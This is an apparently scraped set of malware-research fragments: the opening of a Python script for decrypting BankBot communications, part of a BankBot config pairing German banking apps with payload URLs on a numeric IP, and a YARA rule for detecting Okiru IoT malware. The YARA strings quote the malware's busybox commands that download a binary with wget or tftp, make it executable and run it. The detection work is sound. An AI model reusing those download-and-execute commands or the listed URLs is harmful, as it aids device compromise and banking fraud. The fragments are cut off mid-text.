import sys | |
import urllib | |
__author__ = 'fdiaz@hispasec.com' | |
""" Script to decrypt bankbot communications | |
argv[1] = key | |
argv[2] = encrypted string | |
Example: | |
decrypter.py "qwe" "5w wqq 98 5w 49 wqe 5e 5q 48 48 wqe 98 97 55 53 53 37 5w 65 49 37 5w 65 48" |
[{ | |
"to": "com.db.mm.deutschebank", | |
"body": "http://188.209.49.198/777/l/05.php" | |
}, { | |
"to": "de.commerzbanking.mobil", | |
"body": " http://188.209.49.198/777/l/06.php" | |
}, { | |
"to": "com.ing.diba.mbbr2", | |
"body": " http://188.209.49.198/777/l/13.php" | |
}, { |
rule Okiru : arm7 { | |
meta: | |
date = "11.12.2017" | |
description = "Ruleset to detect the Okiru IoT malware based on the ARMv7 version found." | |
strings: | |
$busy_1 = "/bin/busybox cp /bin/busybox %s; /bin/busybox cp /bin/busybox %s; >%s; >%s; /bin/busybox chmod 777 %s %s" | |
$busy_2 = "/bin/busybox cp /bin/busybox %s; >%s; /bin/busybox chmod 777 %s" | |
$busy_3 = "/bin/busybox wget http://%d.%d.%d.%d:%d/fahwrzadws/okiru.%s -O -> %s; /bin/busybox chmod 777 %s; ./%s; >%s" | |
$busy_4 = "/bin/busybox tftp -r okiru.%s -l %s -g %d.%d.%d.%d; /bin/busybox chmod 777 %s; ./%s; >%s" | |
$busy_5 = "/bin/busybox echo -en '%s' %s %s && /bin/busybox echo -en '\x45\x43\x48\x4f\x44\x4f\x4e\x45'" |